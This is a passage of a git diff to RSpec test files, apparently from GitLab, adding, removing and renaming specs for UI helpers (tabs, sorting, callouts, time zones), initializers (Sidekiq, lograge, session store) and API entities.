+ 1].min) } + let(:resource) { class_double(Ci::Runner, page: page) } + + it { is_expected.to eq(expected_result) } + end + end +end diff --git a/spec/helpers/packages_helper_spec.rb b/spec/helpers/packages_helper_spec.rb index 2af572850da..06c6cccd488 100644 --- a/spec/helpers/packages_helper_spec.rb +++ b/spec/helpers/packages_helper_spec.rb @@ -260,34 +260,4 @@ RSpec.describe 
PackagesHelper do end end end - - describe '#packages_list_data' do - let_it_be(:resource) { project } - let_it_be(:type) { 'project' } - - let(:expected_result) do - { - resource_id: resource.id, - full_path: resource.full_path, - page_type: type - } - end - - subject(:result) { helper.packages_list_data(type, resource) } - - context 'at a project level' do - it 'populates presenter data' do - expect(result).to match(hash_including(expected_result)) - end - end - - context 'at a group level' do - let_it_be(:resource) { create(:group) } - let_it_be(:type) { 'group' } - - it 'populates presenter data' do - expect(result).to match(hash_including(expected_result)) - end - end - end end diff --git a/spec/helpers/projects_helper_spec.rb b/spec/helpers/projects_helper_spec.rb index 5d2af567549..cc443afee6e 100644 --- a/spec/helpers/projects_helper_spec.rb +++ b/spec/helpers/projects_helper_spec.rb @@ -991,4 +991,31 @@ RSpec.describe ProjectsHelper do expect(subject).to eq(project.path_with_namespace) end end + + describe '#fork_button_disabled_tooltip' do + using RSpec::Parameterized::TableSyntax + + subject { helper.fork_button_disabled_tooltip(project) } + + where(:has_user, :can_fork_project, :can_create_fork, :expected) do + false | false | false | nil + true | true | true | nil + true | false | true | 'You don\'t have permission to fork this project' + true | true | false | 'You have reached your project limit' + end + + with_them do + before do + current_user = user if has_user + + allow(helper).to receive(:current_user).and_return(current_user) + allow(user).to receive(:can?).with(:fork_project, project).and_return(can_fork_project) + allow(user).to receive(:can?).with(:create_fork).and_return(can_create_fork) + end + + it 'returns tooltip text when user lacks privilege' do + expect(subject).to eq(expected) + end + end + end end diff --git a/spec/helpers/routing/pseudonymization_helper_spec.rb b/spec/helpers/routing/pseudonymization_helper_spec.rb index 
82ed893289d..d7905edb098 100644 --- a/spec/helpers/routing/pseudonymization_helper_spec.rb +++ b/spec/helpers/routing/pseudonymization_helper_spec.rb @@ -11,15 +11,15 @@ RSpec.describe ::Routing::PseudonymizationHelper do let(:merge_request) { create(:merge_request, source_project: project) } + let(:subject) { helper.masked_page_url(group: group, project: project) } + before do stub_feature_flags(mask_page_urls: true) - allow(helper).to receive(:group).and_return(group) - allow(helper).to receive(:project).and_return(project) end shared_examples 'masked url' do it 'generates masked page url' do - expect(helper.masked_page_url).to eq(masked_url) + expect(subject).to eq(masked_url) end end @@ -72,6 +72,8 @@ RSpec.describe ::Routing::PseudonymizationHelper do context 'with controller for groups with subgroups and project' do let(:masked_url) { "http://localhost/namespace#{subgroup.id}/project#{subproject.id}"} + let(:group) { subgroup } + let(:project) { subproject } let(:request) do double(:Request, path_parameters: { @@ -86,8 +88,6 @@ RSpec.describe ::Routing::PseudonymizationHelper do end before do - allow(helper).to receive(:group).and_return(subgroup) - allow(helper).to receive(:project).and_return(subproject) allow(helper).to receive(:request).and_return(request) end @@ -96,6 +96,7 @@ RSpec.describe ::Routing::PseudonymizationHelper do context 'with controller for groups and subgroups' do let(:masked_url) { "http://localhost/groups/namespace#{subgroup.id}/-/shared"} + let(:group) { subgroup } let(:request) do double(:Request, path_parameters: { @@ -109,7 +110,6 @@ RSpec.describe ::Routing::PseudonymizationHelper do end before do - allow(helper).to receive(:group).and_return(subgroup) allow(helper).to receive(:request).and_return(request) end @@ -160,7 +160,7 @@ RSpec.describe ::Routing::PseudonymizationHelper do end context 'when author_username is present' do - let(:masked_url) { 
"http://localhost/dashboard/issues?author_username=masked_author_username&scope=masked_scope&state=masked_state" } + let(:masked_url) { "http://localhost/dashboard/issues?author_username=masked_author_username&scope=all&state=opened" } let(:request) do double(:Request, path_parameters: { @@ -201,7 +201,7 @@ RSpec.describe ::Routing::PseudonymizationHelper do end context 'when query string has keys with the same names as path params' do - let(:masked_url) { "http://localhost/dashboard/issues?action=masked_action&scope=masked_scope&state=masked_state" } + let(:masked_url) { "http://localhost/dashboard/issues?action=masked_action&scope=all&state=opened" } let(:request) do double(:Request, path_parameters: { @@ -230,7 +230,7 @@ RSpec.describe ::Routing::PseudonymizationHelper do end it 'masked_page_url' do - expect(helper.masked_page_url).to eq(root_url) + expect(subject).to eq(root_url) end end end @@ -262,7 +262,7 @@ RSpec.describe ::Routing::PseudonymizationHelper do ActionController::RoutingError, url: '/dashboard/issues?assignee_username=root').and_call_original - expect(helper.masked_page_url).to be_nil + expect(subject).to be_nil end end end @@ -273,7 +273,7 @@ RSpec.describe ::Routing::PseudonymizationHelper do end it 'returns nil' do - expect(helper.masked_page_url).to be_nil + expect(subject).to be_nil end end end diff --git a/spec/helpers/sorting_helper_spec.rb b/spec/helpers/sorting_helper_spec.rb index f976fb098a8..b49b4ad6e7e 100644 --- a/spec/helpers/sorting_helper_spec.rb +++ b/spec/helpers/sorting_helper_spec.rb @@ -191,4 +191,77 @@ RSpec.describe SortingHelper do end end end + + describe 'with `forks` controller' do + before do + stub_controller_path 'forks' + end + + describe '#forks_sort_options_hash' do + it 'returns a hash of available sorting options' do + expect(forks_sort_options_hash).to include({ + sort_value_recently_created => sort_title_created_date, + sort_value_oldest_created => sort_title_created_date, + sort_value_latest_activity => 
sort_title_latest_activity, + sort_value_oldest_activity => sort_title_latest_activity + }) + end + end + + describe '#forks_reverse_sort_options_hash' do + context 'for each sort option' do + using RSpec::Parameterized::TableSyntax + + where(:sort_key, :reverse_sort_title) do + sort_value_recently_created | sort_value_oldest_created + sort_value_oldest_created | sort_value_recently_created + sort_value_latest_activity | sort_value_oldest_activity + sort_value_oldest_activity | sort_value_latest_activity + end + + with_them do + it 'returns the correct reversed hash' do + reverse_hash = forks_reverse_sort_options_hash + + expect(reverse_hash).to include(sort_key) + expect(reverse_hash[sort_key]).to eq(reverse_sort_title) + end + end + end + end + + describe '#forks_sort_direction_button' do + context 'for each sort option' do + using RSpec::Parameterized::TableSyntax + + sort_lowest_icon = 'sort-lowest' + sort_highest_icon = 'sort-highest' + + where(:selected_sort, :icon) do + sort_value_recently_created | sort_highest_icon + sort_value_latest_activity | sort_highest_icon + sort_value_oldest_created | sort_lowest_icon + sort_value_oldest_activity | sort_lowest_icon + end + + with_them do + it 'returns the correct icon' do + set_sorting_url selected_sort + + expect(forks_sort_direction_button(selected_sort)).to include(icon) + end + end + end + + it 'returns the correct link to reverse the current sort option' do + sort_options_links = forks_reverse_sort_options_hash + + sort_options_links.each do |selected_sort, reverse_sort| + set_sorting_url selected_sort + + expect(forks_sort_direction_button(selected_sort)).to include(reverse_sort) + end + end + end + end end diff --git a/spec/helpers/tab_helper_spec.rb b/spec/helpers/tab_helper_spec.rb index e5e88466946..f338eddedfd 100644 --- a/spec/helpers/tab_helper_spec.rb +++ b/spec/helpers/tab_helper_spec.rb @@ -7,62 +7,58 @@ RSpec.describe TabHelper do describe 'gl_tabs_nav' do it 'creates a tabs navigation' do - 
expect(gl_tabs_nav).to match(%r{<ul class=".*" role="tablist"><\/ul>}) + expect(helper.gl_tabs_nav).to match(%r{<ul class="nav gl-tabs-nav"><\/ul>}) end it 'captures block output' do - expect(gl_tabs_nav { "block content" }).to match(/block content/) - end - - it 'adds styles classes' do - expect(gl_tabs_nav).to match(/class="nav gl-tabs-nav"/) + expect(helper.gl_tabs_nav { "block content" }).to match(/block content/) end it 'adds custom class' do - expect(gl_tabs_nav(class: 'my-class' )).to match(/class=".*my-class.*"/) + expect(helper.gl_tabs_nav(class: 'my-class' )).to match(/class=".*my-class.*"/) end end describe 'gl_tab_link_to' do before do - allow(self).to receive(:current_page?).and_return(false) + allow(helper).to receive(:current_page?).and_return(false) end it 'creates a tab' do - expect(gl_tab_link_to('Link', '/url')).to eq('<li class="nav-item" role="presentation"><a class="nav-link gl-tab-nav-item" href="/url">Link</a></li>') + expect(helper.gl_tab_link_to('Link', '/url')).to eq('<li class="nav-item"><a class="nav-link gl-tab-nav-item" href="/url">Link</a></li>') end it 'creates a tab with block output' do - expect(gl_tab_link_to('/url') { 'block content' }).to match(/block content/) + expect(helper.gl_tab_link_to('/url') { 'block content' }).to match(/block content/) end it 'creates a tab with custom classes for enclosing list item without content block provided' do - expect(gl_tab_link_to('Link', '/url', { tab_class: 'my-class' })).to match(/<li class=".*my-class.*"/) + expect(helper.gl_tab_link_to('Link', '/url', { tab_class: 'my-class' })).to match(/<li class=".*my-class.*"/) end it 'creates a tab with custom classes for enclosing list item with content block provided' do - expect(gl_tab_link_to('/url', { tab_class: 'my-class' }) { 'Link' }).to match(/<li class=".*my-class.*"/) + expect(helper.gl_tab_link_to('/url', { tab_class: 'my-class' }) { 'Link' }).to match(/<li class=".*my-class.*"/) end it 'creates a tab with custom classes for anchor 
element' do - expect(gl_tab_link_to('Link', '/url', { class: 'my-class' })).to match(/<a class=".*my-class.*"/) + expect(helper.gl_tab_link_to('Link', '/url', { class: 'my-class' })).to match(/<a class=".*my-class.*"/) end it 'creates an active tab with item_active = true' do - expect(gl_tab_link_to('Link', '/url', { item_active: true })).to match(/<a class=".*active gl-tab-nav-item-active gl-tab-nav-item-active-indigo.*"/) + expect(helper.gl_tab_link_to('Link', '/url', { item_active: true })).to match(/<a class=".*active gl-tab-nav-item-active gl-tab-nav-item-active-indigo.*"/) end context 'when on the active page' do before do - allow(self).to receive(:current_page?).and_return(true) + allow(helper).to receive(:current_page?).and_return(true) end it 'creates an active tab' do - expect(gl_tab_link_to('Link', '/url')).to match(/<a class=".*active gl-tab-nav-item-active gl-tab-nav-item-active-indigo.*"/) + expect(helper.gl_tab_link_to('Link', '/url')).to match(/<a class=".*active gl-tab-nav-item-active gl-tab-nav-item-active-indigo.*"/) end it 'creates an inactive tab with item_active = false' do - expect(gl_tab_link_to('Link', '/url', { item_active: false })).not_to match(/<a class=".*active.*"/) + expect(helper.gl_tab_link_to('Link', '/url', { item_active: false })).not_to match(/<a class=".*active.*"/) end end end @@ -72,18 +68,18 @@ RSpec.describe TabHelper do before do allow(controller).to receive(:controller_name).and_return('foo') - allow(self).to receive(:action_name).and_return('foo') + allow(helper).to receive(:action_name).and_return('foo') end context 'with the content of the li' do it 'captures block output' do - expect(nav_link { "Testing Blocks" }).to match(/Testing Blocks/) + expect(helper.nav_link { "Testing Blocks" }).to match(/Testing Blocks/) end end it 'passes extra html options to the list element' do - expect(nav_link(action: :foo, html_options: { class: 'home' })).to match(/<li class="home active">/) - expect(nav_link(html_options: { class: 
'active' })).to match(/<li class="active">/) + expect(helper.nav_link(action: :foo, html_options: { class: 'home' })).to match(/<li class="home active">/) + expect(helper.nav_link(html_options: { class: 'active' })).to match(/<li class="active">/) end where(:controller_param, :action_param, :path_param, :active) do @@ -120,13 +116,26 @@ RSpec.describe TabHelper do with_them do specify do - result = nav_link(controller: controller_param, action: action_param, path: path_param) + result = helper.nav_link(controller: controller_param, action: action_param, path: path_param) - if active - expect(result).to match(/active/) - else - expect(result).not_to match(/active/) - end + expect(result.include?('active')).to eq(active) + end + end + + where(:page, :excluded_page, :active) do + nil | nil | false + '_some_page_' | nil | true + '_some_page_' | '_excluded_page_' | true + '_some_page_' | '_some_page_' | false + end + + with_them do + specify do + allow(helper).to receive(:route_matches_pages?).and_return(page.present?, page == excluded_page) + + result = helper.nav_link(page: page, exclude_page: excluded_page) + + expect(result.include?('active')).to eq(active) end end @@ -147,13 +156,9 @@ RSpec.describe TabHelper do with_them do specify do - result = nav_link(controller: controller_param, action: action_param, path: path_param) + result = helper.nav_link(controller: controller_param, action: action_param, path: path_param) - if active - expect(result).to match(/active/) - else - expect(result).not_to match(/active/) - end + expect(result.include?('active')).to eq(active) end end end @@ -161,18 +166,24 @@ RSpec.describe TabHelper do describe 'gl_tab_counter_badge' do it 'creates a tab counter badge' do - expect(gl_tab_counter_badge(1)).to eq('<span class="badge badge-muted badge-pill gl-badge sm gl-tab-counter-badge">1</span>') + expect(helper.gl_tab_counter_badge(1)).to eq( + '<span class="gl-badge badge badge-pill badge-muted sm gl-tab-counter-badge">1</span>' + ) end 
context 'with extra classes' do it 'creates a tab counter badge with the correct class attribute' do - expect(gl_tab_counter_badge(1, { class: 'js-test' })).to eq('<span class="js-test badge badge-muted badge-pill gl-badge sm gl-tab-counter-badge">1</span>') + expect(helper.gl_tab_counter_badge(1, { class: 'js-test' })).to eq( + '<span class="gl-badge badge badge-pill badge-muted sm gl-tab-counter-badge js-test">1</span>' + ) end end context 'with data attributes' do it 'creates a tab counter badge with the data attributes' do - expect(gl_tab_counter_badge(1, { data: { some_attribute: 'foo' } })).to eq('<span class="badge badge-muted badge-pill gl-badge sm gl-tab-counter-badge" data-some-attribute="foo">1</span>') + expect(helper.gl_tab_counter_badge(1, { data: { some_attribute: 'foo' } })).to eq( + '<span data-some-attribute="foo" class="gl-badge badge badge-pill badge-muted sm gl-tab-counter-badge">1</span>' + ) end end end diff --git a/spec/helpers/time_zone_helper_spec.rb b/spec/helpers/time_zone_helper_spec.rb index 006fae5b814..e8d96ee0700 100644 --- a/spec/helpers/time_zone_helper_spec.rb +++ b/spec/helpers/time_zone_helper_spec.rb @@ -30,6 +30,30 @@ RSpec.describe TimeZoneHelper, :aggregate_failures do end end + context 'with abbr format' do + subject(:timezone_data) { helper.timezone_data(format: :abbr) } + + it 'matches schema' do + expect(timezone_data).not_to be_empty + + timezone_data.each_with_index do |timezone_hash, i| + expect(timezone_hash.keys).to contain_exactly( + :identifier, + :abbr + ), "Failed at index #{i}" + end + end + + it 'formats for display' do + tz = ActiveSupport::TimeZone.all[0] + + expect(timezone_data[0]).to eq( + identifier: tz.tzinfo.identifier, + abbr: tz.tzinfo.strftime('%Z') + ) + end + end + context 'with full format' do subject(:timezone_data) { helper.timezone_data(format: :full) } @@ -64,7 +88,7 @@ RSpec.describe TimeZoneHelper, :aggregate_failures do subject(:timezone_data) { helper.timezone_data(format: :unknown) } it 
'raises an exception' do - expect { timezone_data }.to raise_error ArgumentError, 'Invalid format :unknown. Valid formats are :short, :full.' + expect { timezone_data }.to raise_error ArgumentError, 'Invalid format :unknown. Valid formats are :short, :abbr, :full.' end end end @@ -101,7 +125,7 @@ RSpec.describe TimeZoneHelper, :aggregate_failures do end end - describe '#local_time_instance' do + describe '#local_timezone_instance' do let_it_be(:timezone) { 'UTC' } before do @@ -110,25 +134,25 @@ RSpec.describe TimeZoneHelper, :aggregate_failures do context 'when timezone is `nil`' do it 'returns the system timezone instance' do - expect(helper.local_time_instance(nil).name).to eq(timezone) + expect(helper.local_timezone_instance(nil).name).to eq(timezone) end end context 'when timezone is blank' do it 'returns the system timezone instance' do - expect(helper.local_time_instance('').name).to eq(timezone) + expect(helper.local_timezone_instance('').name).to eq(timezone) end end context 'when a valid timezone is passed' do it 'returns the local time instance' do - expect(helper.local_time_instance('America/Los_Angeles').name).to eq('America/Los_Angeles') + expect(helper.local_timezone_instance('America/Los_Angeles').name).to eq('America/Los_Angeles') end end context 'when an invalid timezone is passed' do it 'returns the system timezone instance' do - expect(helper.local_time_instance('Foo/Bar').name).to eq(timezone) + expect(helper.local_timezone_instance('Foo/Bar').name).to eq(timezone) end end end diff --git a/spec/helpers/user_callouts_helper_spec.rb b/spec/helpers/users/callouts_helper_spec.rb index 7abc67e29a4..85e11c2ed3b 100644 --- a/spec/helpers/user_callouts_helper_spec.rb +++ b/spec/helpers/users/callouts_helper_spec.rb @@ -2,7 +2,7 @@ require "spec_helper" -RSpec.describe UserCalloutsHelper do +RSpec.describe Users::CalloutsHelper do let_it_be(:user, refind: true) { create(:user) } before do @@ -61,36 +61,6 @@ RSpec.describe UserCalloutsHelper do end end - 
describe '.show_customize_homepage_banner?' do - subject { helper.show_customize_homepage_banner? } - - context 'when user has not dismissed' do - before do - allow(helper).to receive(:user_dismissed?).with(described_class::CUSTOMIZE_HOMEPAGE) { false } - end - - context 'when user is on the default dashboard' do - it { is_expected.to be true } - end - - context 'when user is not on the default dashboard' do - before do - user.dashboard = 'stars' - end - - it { is_expected.to be false } - end - end - - context 'when user dismissed' do - before do - allow(helper).to receive(:user_dismissed?).with(described_class::CUSTOMIZE_HOMEPAGE) { true } - end - - it { is_expected.to be false } - end - end - describe '.render_flash_user_callout' do it 'renders the flash_user_callout partial' do expect(helper).to receive(:render) @@ -115,7 +85,7 @@ RSpec.describe UserCalloutsHelper do context 'when the feature flags new version has been dismissed' do before do - create(:user_callout, user: user, feature_name: described_class::FEATURE_FLAGS_NEW_VERSION) + create(:callout, user: user, feature_name: described_class::FEATURE_FLAGS_NEW_VERSION) end it { is_expected.to be_falsy } @@ -203,83 +173,6 @@ RSpec.describe UserCalloutsHelper do end end - describe '.show_invite_banner?' 
do - let_it_be(:group) { create(:group) } - - subject { helper.show_invite_banner?(group) } - - context 'when user has the admin ability for the group' do - before do - group.add_owner(user) - end - - context 'when the invite_members_banner has not been dismissed' do - it { is_expected.to eq(true) } - - context 'when the group was just created' do - before do - flash[:notice] = "Group #{group.name} was successfully created" - end - - it { is_expected.to eq(false) } - end - - context 'with concerning multiple members' do - let_it_be(:user_2) { create(:user) } - - context 'on current group' do - before do - group.add_guest(user_2) - end - - it { is_expected.to eq(false) } - end - - context 'on current group that is a subgroup' do - let_it_be(:subgroup) { create(:group, parent: group) } - - subject { helper.show_invite_banner?(subgroup) } - - context 'with only one user on parent and this group' do - it { is_expected.to eq(true) } - end - - context 'when another user is on this group' do - before do - subgroup.add_guest(user_2) - end - - it { is_expected.to eq(false) } - end - - context 'when another user is on the parent group' do - before do - group.add_guest(user_2) - end - - it { is_expected.to eq(false) } - end - end - end - end - - context 'when the invite_members_banner has been dismissed' do - before do - create(:group_callout, - user: user, - group: group, - feature_name: described_class::INVITE_MEMBERS_BANNER) - end - - it { is_expected.to eq(false) } - end - end - - context 'when user does not have admin ability for the group' do - it { is_expected.to eq(false) } - end - end - describe '.show_security_newsletter_user_callout?' 
do let_it_be(:admin) { create(:user, :admin) } diff --git a/spec/helpers/users/group_callouts_helper_spec.rb b/spec/helpers/users/group_callouts_helper_spec.rb new file mode 100644 index 00000000000..da67c4921b3 --- /dev/null +++ b/spec/helpers/users/group_callouts_helper_spec.rb @@ -0,0 +1,87 @@ +# frozen_string_literal: true + +require "spec_helper" + +RSpec.describe Users::GroupCalloutsHelper do + let_it_be(:user, refind: true) { create(:user) } + let_it_be(:group) { create(:group) } + + before do + allow(helper).to receive(:current_user).and_return(user) + end + + describe '.show_invite_banner?' do + subject { helper.show_invite_banner?(group) } + + context 'when user has the admin ability for the group' do + before do + group.add_owner(user) + end + + context 'when the invite_members_banner has not been dismissed' do + it { is_expected.to eq(true) } + + context 'when the group was just created' do + before do + flash[:notice] = "Group #{group.name} was successfully created" + end + + it { is_expected.to eq(false) } + end + + context 'with concerning multiple members' do + let_it_be(:user_2) { create(:user) } + + context 'on current group' do + before do + group.add_guest(user_2) + end + + it { is_expected.to eq(false) } + end + + context 'on current group that is a subgroup' do + let_it_be(:subgroup) { create(:group, parent: group) } + + subject { helper.show_invite_banner?(subgroup) } + + context 'with only one user on parent and this group' do + it { is_expected.to eq(true) } + end + + context 'when another user is on this group' do + before do + subgroup.add_guest(user_2) + end + + it { is_expected.to eq(false) } + end + + context 'when another user is on the parent group' do + before do + group.add_guest(user_2) + end + + it { is_expected.to eq(false) } + end + end + end + end + + context 'when the invite_members_banner has been dismissed' do + before do + create(:group_callout, + user: user, + group: group, + feature_name: 
described_class::INVITE_MEMBERS_BANNER) + end + + it { is_expected.to eq(false) } + end + end + + context 'when user does not have admin ability for the group' do + it { is_expected.to eq(false) } + end + end +end diff --git a/spec/helpers/version_check_helper_spec.rb b/spec/helpers/version_check_helper_spec.rb index 6d849d0720e..bd52eda8a65 100644 --- a/spec/helpers/version_check_helper_spec.rb +++ b/spec/helpers/version_check_helper_spec.rb @@ -15,7 +15,7 @@ RSpec.describe VersionCheckHelper do before do stub_rails_env('production') allow(Gitlab::CurrentSettings.current_application_settings).to receive(:version_check_enabled) { true } - allow(VersionCheck).to receive(:url) { 'https://version.host.com/check.svg?gitlab_info=xxx' } + allow(VersionCheck).to receive(:image_url) { 'https://version.host.com/check.svg?gitlab_info=xxx' } end it 'returns an image tag' do @@ -27,7 +27,7 @@ RSpec.describe VersionCheckHelper do .to match(/class="js-version-status-badge lazy"/) end - it 'has a VersionCheck url as the src' do + it 'has a VersionCheck image_url as the src' do expect(helper.version_status_badge) .to include(%{src="https://version.host.com/check.svg?gitlab_info=xxx"}) end diff --git a/spec/initializers/forbid_sidekiq_in_transactions_spec.rb b/spec/initializers/forbid_sidekiq_in_transactions_spec.rb new file mode 100644 index 00000000000..6cd15d37ad4 --- /dev/null +++ b/spec/initializers/forbid_sidekiq_in_transactions_spec.rb @@ -0,0 +1,38 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'Sidekiq::Worker' do + let(:worker_class) do + Class.new do + include Sidekiq::Worker + + def perform + end + end + end + + it 'allows sidekiq worker outside of a transaction' do + expect { worker_class.perform_async }.not_to raise_error + end + + it 'forbids queue sidekiq worker in a transaction' do + Project.transaction do + expect { worker_class.perform_async }.to raise_error(Sidekiq::Worker::EnqueueFromTransactionError) + end + end + + it 'allows 
sidekiq worker in a transaction if skipped' do + Sidekiq::Worker.skipping_transaction_check do + Project.transaction do + expect { worker_class.perform_async }.not_to raise_error + end + end + end + + it 'forbids queue sidekiq worker in a Ci::ApplicationRecord transaction' do + Ci::Pipeline.transaction do + expect { worker_class.perform_async }.to raise_error(Sidekiq::Worker::EnqueueFromTransactionError) + end + end +end diff --git a/spec/initializers/lograge_spec.rb b/spec/initializers/lograge_spec.rb index 9e58fa289ac..0a794e8ebcd 100644 --- a/spec/initializers/lograge_spec.rb +++ b/spec/initializers/lograge_spec.rb @@ -157,6 +157,16 @@ RSpec.describe 'lograge', type: :request do expect(log_data['exception.message']).to eq('bad request') expect(log_data['exception.backtrace']).to eq(Gitlab::BacktraceCleaner.clean_backtrace(backtrace)) end + + context 'with an ActiveRecord::StatementInvalid' do + let(:exception) { ActiveRecord::StatementInvalid.new(sql: 'SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."foo" = $1') } + + it 'adds the SQL query to the log' do + subscriber.process_action(event) + + expect(log_data['exception.sql']).to eq('SELECT "users".* FROM "users" WHERE "users"."id" = $2 AND "users"."foo" = $1') + end + end end describe 'with etag_route' do diff --git a/spec/initializers/session_store_spec.rb b/spec/initializers/session_store_spec.rb index 3da52ccc981..db90b335dc9 100644 --- a/spec/initializers/session_store_spec.rb +++ b/spec/initializers/session_store_spec.rb @@ -10,25 +10,37 @@ RSpec.describe 'Session initializer for GitLab' do end describe 'config#session_store' do - context 'when the GITLAB_REDIS_STORE_WITH_SESSION_STORE env is not set' do + context 'when the GITLAB_USE_REDIS_SESSIONS_STORE env is not set' do before do - stub_env('GITLAB_REDIS_STORE_WITH_SESSION_STORE', nil) + stub_env('GITLAB_USE_REDIS_SESSIONS_STORE', nil) end - it 'initialized as a redis_store with a proper Redis::Store instance' do + it 'initialized with 
Multistore as ENV var defaults to true' do expect(subject).to receive(:session_store).with(:redis_store, a_hash_including(redis_store: kind_of(::Redis::Store))) load_session_store end end - context 'when the GITLAB_REDIS_STORE_WITH_SESSION_STORE env is disabled' do + context 'when the GITLAB_USE_REDIS_SESSIONS_STORE env is disabled' do before do - stub_env('GITLAB_REDIS_STORE_WITH_SESSION_STORE', false) + stub_env('GITLAB_USE_REDIS_SESSIONS_STORE', false) end it 'initialized as a redis_store with a proper servers configuration' do - expect(subject).to receive(:session_store).with(:redis_store, a_hash_including(servers: kind_of(Hash))) + expect(subject).to receive(:session_store).with(:redis_store, a_hash_including(redis_store: kind_of(Redis::Store))) + + load_session_store + end + end + + context 'when the GITLAB_USE_REDIS_SESSIONS_STORE env is enabled' do + before do + stub_env('GITLAB_USE_REDIS_SESSIONS_STORE', true) + end + + it 'initialized as a redis_store with a proper servers configuration' do + expect(subject).to receive(:session_store).with(:redis_store, a_hash_including(redis_store: kind_of(::Redis::Store))) load_session_store end diff --git a/spec/initializers/validate_database_config_spec.rb b/spec/initializers/validate_database_config_spec.rb index 99e4a4b36ee..209d9691350 100644 --- a/spec/initializers/validate_database_config_spec.rb +++ b/spec/initializers/validate_database_config_spec.rb @@ -14,6 +14,9 @@ RSpec.describe 'validate database config' do end before do + allow(File).to receive(:exist?).and_call_original + allow(File).to receive(:exist?).with(Rails.root.join("config/database_geo.yml")).and_return(false) + # The `AS::ConfigurationFile` calls `read` in `def initialize` # thus we cannot use `expect_next_instance_of` # rubocop:disable RSpec/AnyInstanceOf diff --git a/spec/lib/after_commit_queue_spec.rb b/spec/lib/after_commit_queue_spec.rb deleted file mode 100644 index ca383808bfc..00000000000 --- a/spec/lib/after_commit_queue_spec.rb +++ 
/dev/null @@ -1,17 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe AfterCommitQueue do - it 'runs after transaction is committed' do - called = false - test_proc = proc { called = true } - - project = build(:project) - project.run_after_commit(&test_proc) - - project.save - - expect(called).to be true - end -end diff --git a/spec/lib/api/ci/helpers/runner_helpers_spec.rb b/spec/lib/api/ci/helpers/runner_helpers_spec.rb index c6638bea59e..c4d740f0adc 100644 --- a/spec/lib/api/ci/helpers/runner_helpers_spec.rb +++ b/spec/lib/api/ci/helpers/runner_helpers_spec.rb @@ -38,6 +38,7 @@ RSpec.describe API::Ci::Helpers::Runner do let(:revision) { '10.0' } let(:platform) { 'test' } let(:architecture) { 'arm' } + let(:executor) { 'shell' } let(:config) { { 'gpus' => 'all' } } let(:runner_params) do { @@ -48,6 +49,7 @@ RSpec.describe API::Ci::Helpers::Runner do 'revision' => revision, 'platform' => platform, 'architecture' => architecture, + 'executor' => executor, 'config' => config, 'ignored' => 1 } @@ -57,12 +59,13 @@ RSpec.describe API::Ci::Helpers::Runner do subject(:details) { runner_helper.get_runner_details_from_request } it 'extracts the runner details', :aggregate_failures do - expect(details.keys).to match_array(%w(name version revision platform architecture config ip_address)) + expect(details.keys).to match_array(%w(name version revision platform architecture executor config ip_address)) expect(details['name']).to eq(name) expect(details['version']).to eq(version) expect(details['revision']).to eq(revision) expect(details['platform']).to eq(platform) expect(details['architecture']).to eq(architecture) + expect(details['executor']).to eq(executor) expect(details['config']).to eq(config) expect(details['ip_address']).to eq(ip_address) end diff --git a/spec/lib/api/entities/changelog_spec.rb b/spec/lib/api/entities/changelog_spec.rb new file mode 100644 index 00000000000..2cf585d4e0e --- /dev/null +++ 
b/spec/lib/api/entities/changelog_spec.rb @@ -0,0 +1,17 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe API::Entities::Changelog do + let(:changelog) { "This is a changelog" } + + subject { described_class.new(changelog).as_json } + + it 'exposes correct attributes' do + expect(subject).to include(:notes) + end + + it 'exposes correct notes' do + expect(subject[:notes]).to eq(changelog) + end +end diff --git a/spec/lib/api/entities/ci/pipeline_spec.rb b/spec/lib/api/entities/ci/pipeline_spec.rb new file mode 100644 index 00000000000..6a658cc3e18 --- /dev/null +++ b/spec/lib/api/entities/ci/pipeline_spec.rb @@ -0,0 +1,16 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe API::Entities::Ci::Pipeline do + let_it_be(:pipeline) { create(:ci_empty_pipeline) } + let_it_be(:job) { create(:ci_build, name: "rspec", coverage: 30.212, pipeline: pipeline) } + + let(:entity) { described_class.new(pipeline) } + + subject { entity.as_json } + + it 'returns the coverage as a string' do + expect(subject[:coverage]).to eq '30.21' + end +end diff --git a/spec/lib/api/entities/personal_access_token_spec.rb b/spec/lib/api/entities/personal_access_token_spec.rb new file mode 100644 index 00000000000..fd3c53a21b4 --- /dev/null +++ b/spec/lib/api/entities/personal_access_token_spec.rb @@ -0,0 +1,26 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe API::Entities::PersonalAccessToken do + describe '#as_json' do + let_it_be(:user) { create(:user) } + let_it_be(:token) { create(:personal_access_token, user: user, expires_at: nil) } + + let(:entity) { described_class.new(token) } + + it 'returns token data' do + expect(entity.as_json).to eq({ + id: token.id, + name: token.name, + revoked: false, + created_at: token.created_at, + scopes: ['api'], + user_id: user.id, + last_used_at: nil, + active: true, + expires_at: nil + }) + end + end +end diff --git a/spec/lib/api/entities/plan_limit_spec.rb 
b/spec/lib/api/entities/plan_limit_spec.rb index 75e39e4f074..1b8b21d47f3 100644 --- a/spec/lib/api/entities/plan_limit_spec.rb +++ b/spec/lib/api/entities/plan_limit_spec.rb @@ -11,6 +11,7 @@ RSpec.describe API::Entities::PlanLimit do expect(subject).to include( :conan_max_file_size, :generic_packages_max_file_size, + :helm_max_file_size, :maven_max_file_size, :npm_max_file_size, :nuget_max_file_size, diff --git a/spec/lib/api/entities/project_import_failed_relation_spec.rb b/spec/lib/api/entities/project_import_failed_relation_spec.rb index d3c24f6fce3..d6143915ecb 100644 --- a/spec/lib/api/entities/project_import_failed_relation_spec.rb +++ b/spec/lib/api/entities/project_import_failed_relation_spec.rb @@ -16,7 +16,8 @@ RSpec.describe API::Entities::ProjectImportFailedRelation do exception_class: import_failure.exception_class, exception_message: nil, relation_name: import_failure.relation_key, - source: import_failure.source + source: import_failure.source, + line_number: import_failure.relation_index ) end end diff --git a/spec/lib/api/entities/project_import_status_spec.rb b/spec/lib/api/entities/project_import_status_spec.rb index 5eda613a6a6..37a18718950 100644 --- a/spec/lib/api/entities/project_import_status_spec.rb +++ b/spec/lib/api/entities/project_import_status_spec.rb @@ -2,29 +2,32 @@ require 'spec_helper' -RSpec.describe API::Entities::ProjectImportStatus do +RSpec.describe API::Entities::ProjectImportStatus, :aggregate_failures do describe '#as_json' do subject { entity.as_json } let(:correlation_id) { 'cid' } context 'when no import state exists' do - let(:entity) { 